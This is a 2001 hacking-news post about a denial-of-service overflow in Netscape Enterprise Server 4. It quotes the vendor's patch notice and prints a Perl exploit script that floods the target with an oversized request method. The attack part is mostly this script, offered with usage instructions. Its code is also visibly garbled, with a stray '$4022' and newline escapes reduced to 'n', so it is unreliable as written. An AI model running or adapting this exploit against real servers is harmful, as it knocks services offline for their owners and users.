Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Netscape Enterprise Server 4 Method and URI overflow

Netscape Enterprise Server 4 Method and URI overflow

by phiber on May 20th, 2001 By sending an invalid method or URI request of 4022 bytes Netscape Enterprise Server will stop responding to requests. Read More for exploit info.


Vendor's Response:

The security & stability of iPlanet's customer's environments is one of our paramount concerns. To ensure the stability of our customer's environments iPlanet has made available an NSAPI patch that can be applied to iPlanet Web Server, Enterprise Edition version 4.1 Service Packs 3 through 7. The NSAPI patch is available at:

http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html.
This issue will also be addressed by the release of iPlanet Web Server, Enterprise Edition version 4.1 Service Pack 8.


Exploit


#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 2) {
print "Usage: host portn";
exit;
}
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
$sock= IO::Socket::INET->new(Proto=>"TCP",
PeerAddr=>$ARGV[0],
PeerPort=>"$ARGV[1]",)
or die "Cant connect to $ARGV[0]: $!n";
$sock->autoflush(1);
print $sock "$overflow /index.html HTTP/1.0nn";
$response=<$sock>;
print "$response";
while(<$sock>){
print "$_n";
}
close $sock;
}



This vulnerabily was posted on a bt mailing list by Robert Cardona


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »